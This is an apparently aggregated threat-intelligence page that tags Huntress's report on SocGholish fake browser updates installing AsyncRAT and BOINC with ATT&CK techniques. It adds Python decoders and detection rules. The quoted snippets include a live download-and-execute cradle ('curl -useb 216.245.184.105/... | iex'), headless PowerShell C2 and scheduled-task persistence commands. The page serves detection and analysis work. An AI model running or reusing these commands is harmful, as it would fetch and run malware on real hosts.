TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

Fake Browser Updates Lead to BOINC Volunteer Computing Software | Huntress

2024-07-17 · Read original ↗

ATT&CK techniques detected

22 predictions
T1059.001 PowerShell
100%
“"powershell.exe" -c curl -useb 216.245.184.105/1.php?s=boicn | iex Discovery command: "c:\windows\system32\net.exe" localgroup administrators Command and control: "c:\\windows\\system32\\conhost.exe" --headless powershell.(-join(0..16…”
T1053.005 Scheduled Task
100%
“commands or software on the host to further escalate privileges or move laterally through a network and compromise an entire domain. Persistence: Scheduled tasks were created at several points in the infection. As a result of the AsyncRAT, scheduled tasks were created to maintain …”
T1053.005 Scheduled Task
100%
“number of methods that could be used to detect this behavior in this attack: - Process creation using boinc.exe (original file name) with a process name other than boinc.exe - Windows PowerShell event log ID 4104 (with ScriptBlock logging enabled) that contains the string …”
T1053.005 Scheduled Task
99%
“exactly what occurred on the host by examining the script. It creates a list of directory names and randomly chooses one of them to use on the host (using the Get-Random PowerShell cmdlet, which utilizes numbers from 0 to [int32]::MaxValue). Then it sets the full path and cr…”
T1053.005 Scheduled Task
99%
““$tasknm” -Settings $settings; schtasks.exe /r /tn “$taskm” Windows Security Event ID 4698 monitors scheduled task creation. Monitor these events for any suspicious new tasks in your environment that may execute software from suspicious new locations, such as subdirec…”
T1059.001 PowerShell
98%
“for downloading the later stages of the kill chain. In this particular case, two disjointed chains occur, with one resulting in a fileless variant of AsyncRAT and the other ending in a malicious BOINC (Berkeley Open Infrastructure Network Computing client) installation. The seco…”
T1053.005 Scheduled Task
95%
“as created by the script, is run on the host. "c:\windows\system32\schtasks.exe" /run /tn system_health_service_790926033 It creates a registry value. This is a unique misspelling of the word “experience” that’s been used in the past in conjunction with the …”
T1204.002 Malicious File
93%
“Fake Browser Updates Lead to BOINC Volunteer Computing Software | Huntress Beginning on July 4, 2024, Huntress observed new behaviors in conjunction with malware typically called SocGholish or FakeUpdates. This is a large malware group, with a number of new campaigns and similar …”
T1053.005 Scheduled Task
92%
“and similarly named C2 domain names created by DGA. Behaviors overlapping with SocGholish/FakeUpdates: - Initial access method (update.js fake browser update) - Top-level domain (.top) - PowerShell WebRequest to download .svg file - Installing AsyncRAT (via the .svg file…”
T1021.002 SMB/Windows Admin Shares
91%
“…wall add allowedprogram c:\program files\sentinelone\sentinel agent 23.2.3.358\sentineldotnetfx.dll systemupdate enable "c:\windows\system32\conhost.exe" --headless powershell -ep bypass azureget-smbsession "c:\windows\system32\conhost.exe"…”
T1059.001 PowerShell
90%
“of the PowerShell loader. This technique is used several times throughout the various PowerShell stages with different XOR keys. - Decode the Base64 string - XOR the bytes with the key "bj3rtga4myi5" - Decompress the contents using gzip - Run the result using IEX The following …”
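The four-step unwrapping quoted in this snippet (Base64, XOR with a short key, gzip, IEX) is easy to reverse offline, which is how an analyst gets at the next stage without executing anything. The block below is an added Python example written for this page; it is not the Huntress script and not the loader's own code. The key "bj3rtga4myi5" is the one quoted on the page; the second key, the payload text, and the two-stage sample are constructed here so the example runs stand-alone. Real stages embed the next blob inside PowerShell wrapper code, which this example simplifies by treating each decoded layer as the next blob directly.

```python
"""Reverse the layered PowerShell loader stages described in the write-up:
Base64 -> XOR with a short repeating key -> gzip -> IEX.  encode_stage()
exists only to build a constructed sample offline; the second key and the
payload text are made up for this example."""
import base64
import gzip
from itertools import cycle

GZIP_MAGIC = b"\x1f\x8b"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the operation is its own inverse."""
    if not key:
        raise ValueError("empty XOR key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def encode_stage(script: str, key: str) -> str:
    """Build one stage in the reverse of the unwrapping order:
    gzip the script, XOR it with the key, then Base64-encode it."""
    compressed = gzip.compress(script.encode("utf-8"), mtime=0)
    return base64.b64encode(xor_bytes(compressed, key.encode("ascii"))).decode("ascii")


def key_is_valid(blob: str, key: str) -> bool:
    """Cheap key check: after XOR the stream must start with the gzip magic bytes."""
    head = xor_bytes(base64.b64decode(blob)[:2], key.encode("ascii"))
    return head == GZIP_MAGIC


def decode_stage(blob: str, key: str) -> str:
    """Reverse one stage: Base64-decode, XOR with the key, gunzip.
    The final IEX step is deliberately not performed."""
    if not key_is_valid(blob, key):
        raise ValueError("not a gzip stream after XOR; wrong key?")
    raw = xor_bytes(base64.b64decode(blob), key.encode("ascii"))
    return gzip.decompress(raw).decode("utf-8")


def unwrap_chain(blob: str, keys) -> list:
    """Peel nested stages in order. The write-up notes a different XOR key per
    stage, so each layer takes its own key; every decoded layer is returned."""
    layers = []
    for key in keys:
        blob = decode_stage(blob, key)
        layers.append(blob)
    return layers


# Constructed two-stage sample: stage 0 uses the key quoted on the page,
# stage 1 uses a made-up key ("k3y2").
FINAL_PAYLOAD = "Write-Host 'final stage would run here'"
SAMPLE_KEYS = ["bj3rtga4myi5", "k3y2"]
SAMPLE_BLOB = encode_stage(encode_stage(FINAL_PAYLOAD, SAMPLE_KEYS[1]), SAMPLE_KEYS[0])

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap_chain(SAMPLE_BLOB, SAMPLE_KEYS)):
        print(f"layer {depth}: {layer[:60]}")
```

The gzip magic check is the practical payoff: when a stage's key is unknown, a candidate key can be rejected after decoding two bytes rather than after a failed decompression, and the same check confirms that the key recovered from the script text is the one actually used.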
T1053.005 Scheduled Task
90%
“NiceNIC International Group Co., Limited” and a registrant country of South Africa. This is a very similar network infrastructure to that noted by AT&T Alien Labs in January 2024 used by an adversary to install AsyncRAT. Using Validin, we can clearly see the changes in the cur…”
T1053.005 Scheduled Task
86%
“task: "command_with_args": "c:\\users\\<redacted>\\appdata\\roaming\\eula updater\\securityhealthservice.exe --detach_console", "name": "cleanupmgrtask_1322139014", "task_file": "c:\\windows\\system32\\tasks\\cleanupmg…”
T1053.005 Scheduled Task
86%
“same file paths, server domains, and even file names for the BOINC client that was used. A recent OTX pulse created on July 12, 2024 also shows many of the same domains, IP addresses, files, and TTPs observed by Huntress. - Malicious software is installed as a service - Copies of…”
T1059.001 PowerShell
79%
“NiceNIC International Group Co., Limited” and a registrant country of South Africa. This is a very similar network infrastructure to that noted by AT&T Alien Labs in January 2024 used by an adversary to install AsyncRAT. Using Validin, we can clearly see the changes in the cur…”
T1059.001 PowerShell
70%
“and similarly named C2 domain names created by DGA. Behaviors overlapping with SocGholish/FakeUpdates: - Initial access method (update.js fake browser update) - Top-level domain (.top) - PowerShell WebRequest to download .svg file - Installing AsyncRAT (via the .svg file…”
T1053.005 Scheduled Task
68%
“-9]{1,10} system_health_service_[0-9]{1,10} cleanupmgrtask_[0-9]{,110}_[0-9]{8,10} Associated malware families: There’s a growing number of campaigns and malware with overlapping techniques, especially using fake browser updates as the init…”
T1059.001 PowerShell
66%
“3: Suspicious process name The PowerShell script used to download BOINC to the host also renamed the executable file from a list of names and a command to randomly choose a name from the list. This process included an option to not use a name at all, and we observed the BOINC so…”
T1053.005 Scheduled Task
65%
“we observed showed no tasks had been executed on the hosts, meaning that no functionality of the BOINC communication protocols, such as tasks or computing, appeared to have ever been issued. Both domains used for these servers were recently created: The files seen communicating …”
T1204.002 Malicious File
62%
“-9]{1,10} system_health_service_[0-9]{1,10} cleanupmgrtask_[0-9]{,110}_[0-9]{8,10} Associated malware families: There’s a growing number of campaigns and malware with overlapping techniques, especially using fake browser updates as the init…”
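The snippets above describe three host-side detections: a process whose PE OriginalFileName is boinc.exe running under another image name, PowerShell ScriptBlock logging (Event ID 4104) or process command lines carrying the "curl -useb … | iex" cradle, and scheduled-task creation (Event ID 4698) whose task names match the campaign's generator patterns or whose command runs out of a user's roaming profile. The block below is an added Python example for this page, not Huntress detection content and not a Huntress tool. The sample events are constructed, modelled on the paths and names quoted on this page. The cleanupmgrtask quantifier as quoted is garbled ("{,110}"); the example assumes {1,10}, which fits the observed name cleanupmgrtask_1322139014. Task records use the same "name" / "command_with_args" keys as the task record quoted above.

```python
"""Detection checks for the behaviours quoted on this page, run over
constructed sample events (not Huntress telemetry): a boinc.exe binary
running under another name, the "curl -useb ... | iex" download cradle,
and scheduled tasks whose names match the campaign's generator or that
run from a user's roaming profile."""
import re

# Task-name patterns quoted on the page. The cleanupmgrtask quantifier on the
# page is garbled ("{,110}"); {1,10} is assumed here, which fits the observed
# name cleanupmgrtask_1322139014.
TASK_NAME_PATTERNS = [
    re.compile(r"^system_health_service_[0-9]{1,10}$", re.IGNORECASE),
    re.compile(r"^cleanupmgrtask_[0-9]{1,10}$", re.IGNORECASE),
]

# The download cradle from the AsyncRAT chain, independent of host and URL.
DOWNLOAD_CRADLE = re.compile(r"\bcurl\s+-useb\s+\S+\s*\|\s*iex\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Final path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def renamed_boinc(event: dict) -> bool:
    """Process creation (Sysmon Event ID 1 style fields) where the PE's
    OriginalFileName is boinc.exe but the image on disk has another name."""
    original = event.get("OriginalFileName", "").lower()
    return original == "boinc.exe" and basename(event.get("Image", "")) != "boinc.exe"


def download_cradle(event: dict) -> bool:
    """4104 ScriptBlockText, or a process CommandLine, carrying the cradle."""
    text = event.get("ScriptBlockText") or event.get("CommandLine") or ""
    return DOWNLOAD_CRADLE.search(text) is not None


def suspicious_task(task: dict) -> bool:
    """Task record in the write-up's own shape (name / command_with_args):
    flag campaign-style names, or any task launching from AppData\\Roaming."""
    name = task.get("name", "").lower()
    command = task.get("command_with_args", "").lower()
    runs_from_profile = "\\appdata\\roaming\\" in command
    return any(p.match(name) for p in TASK_NAME_PATTERNS) or runs_from_profile


def triage(process_events, script_blocks, tasks):
    """Run every check; return (rule, identifier) pairs in input order."""
    hits = []
    for ev in process_events:
        if renamed_boinc(ev):
            hits.append(("renamed_boinc", ev["Image"]))
        if download_cradle(ev):
            hits.append(("download_cradle", ev.get("CommandLine", "")))
    for ev in script_blocks:
        if download_cradle(ev):
            hits.append(("download_cradle", ev["ScriptBlockText"]))
    for task in tasks:
        if suspicious_task(task):
            hits.append(("suspicious_task", task["name"]))
    return hits


# Constructed sample telemetry modelled on the paths and names quoted above.
PROCESS_EVENTS = [
    {"Image": r"C:\Users\<redacted>\AppData\Roaming\EULA Updater\SecurityHealthService.exe",
     "OriginalFileName": "boinc.exe",
     "CommandLine": r'"C:\Users\<redacted>\AppData\Roaming\EULA Updater\SecurityHealthService.exe" --detach_console'},
    {"Image": r"C:\Program Files\BOINC\boinc.exe",  # legitimate install: same name, no hit
     "OriginalFileName": "boinc.exe",
     "CommandLine": r'"C:\Program Files\BOINC\boinc.exe"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": '"powershell.exe" -c curl -useb 216.245.184.105/1.php?s=boicn | iex'},
]
SCRIPT_BLOCKS = [
    {"ScriptBlockText": "curl -useb 216.245.184.105/1.php?s=boicn | iex"},
    {"ScriptBlockText": "Get-ChildItem C:\\Temp | Measure-Object"},  # benign
]
TASKS = [
    {"name": "cleanupmgrtask_1322139014",
     "command_with_args": r"c:\users\<redacted>\appdata\roaming\eula updater\securityhealthservice.exe --detach_console"},
    {"name": "system_health_service_790926033",
     "command_with_args": r"c:\users\<redacted>\appdata\roaming\eula updater\securityhealthservice.exe --detach_console"},
    {"name": "MicrosoftEdgeUpdateTaskMachineCore",  # benign vendor task
     "command_with_args": r"c:\program files (x86)\microsoft\edgeupdate\microsoftedgeupdate.exe /c"},
]

if __name__ == "__main__":
    for rule, ident in triage(PROCESS_EVENTS, SCRIPT_BLOCKS, TASKS):
        print(f"{rule:16} {ident}")
```

The OriginalFileName check is the one that survives the campaign's random renaming, because the PE version resource travels with the file whatever it is called on disk; the name patterns are cheap but will drift when the generator changes, which is why the profile-path check is kept as a second, name-independent trigger.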
T1204.002 Malicious File
46%
“…Gholish and AsyncRAT together provides excellent opportunities to detect and track behaviors of these families (or similar malware). This makes it much easier to identify new tactics being used. When one behavior changes, the other likely hasn’t changed. So you can explore …”
T1547.001 Registry Run Keys / Startup Folder
36%
“as created by the script, is run on the host. "c:\windows\system32\schtasks.exe" /run /tn system_health_service_790926033 It creates a registry value. This is a unique misspelling of the word “experience” that’s been used in the past in conjunction with the …”

Summary

Huntress has observed new behaviors in conjunction with the malware SocGholish. Read on to understand the implications of this threat and how you can better protect yourself.